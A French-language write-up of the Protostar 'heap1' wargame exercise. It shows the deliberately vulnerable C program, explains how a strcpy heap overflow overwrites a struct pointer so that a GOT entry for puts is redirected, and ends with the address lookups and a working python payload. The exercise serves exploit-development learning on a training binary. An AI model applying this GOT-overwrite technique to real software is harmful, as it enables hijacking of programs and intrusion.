====== Heap1 ======
#include
#include
#include
#include
#include
struct internet {
int priority;
char *name;
};
void winner()
{
printf("and we have a winner @ %d\n", time(NULL));
}
int main(int argc, char **argv)
{
struct internet *i1, *i2, *i3;
i1 = malloc(sizeof(struct internet));
i1->priority = 1;
i1->name = malloc(8);
i2 = malloc(sizeof(struct internet));
i2->priority = 2;
i2->name = malloc(8);
strcpy(i1->name, argv[1]);
strcpy(i2->name, argv[2]);
printf("and that's a wrap folks!\n");
}
Bon la vulnérabilité ne saute pas forcement au yeux du premier coup. Je vais essayer d'expliquer du mieux que je peux où elle se trouve.
On a une structure ''internet'' qui contient deux paramètres, ''priority'' et ''name''. Le programme alloue de la mémoire pour une première structure de ce type. Il positionne à 1 la valeur de ''priority'' et alloue un buffer de 8 octets à ''name''. Il réalise une seconde fois cette opération. Puis, il copie dans le buffer de 8 octets ''i1->name'' l'argument 1, et copie dans le buffer de 8 octets ''i2->name'' l'argument 2.
Si on met plus de 8 caractères dans l'argument 1, le ''strcpy'' va déborder sur une partie de la seconde structure ''internet'' (''i2''). On va commencer par écrire par dessus ''i2->priority'' puis sur ''i2->name''. Cette dernière variable est en fait un pointeur vers le buffer de 8 octets aloué précédement. Si grâce au premier ''strcpy'' on écrit l'adresse de ''puts'' dans la GOT à la place du pointeur ''i2->name'' et que l'on donne pour valeur au second argument du programme l'adresse de la fonction ''winner'', au moment du ''printf(...)'' le programme sera redirigé vers la fonction ''winner'' ;-)
user@protostar:/opt/protostar/bin$ objdump -TR ./heap1 | grep puts
08049774 R_386_JUMP_SLOT puts
user@protostar:/opt/protostar/bin$ nm ./heap1 | grep winner
08048494 T winner
user@protostar:/opt/protostar/bin$ ./heap1 $(python -c 'print "A"*20+"\x74\x97\x04\x08"') $(python -c 'print "\x94\x84\x04\x08"')
and we have a winner @ 1351274422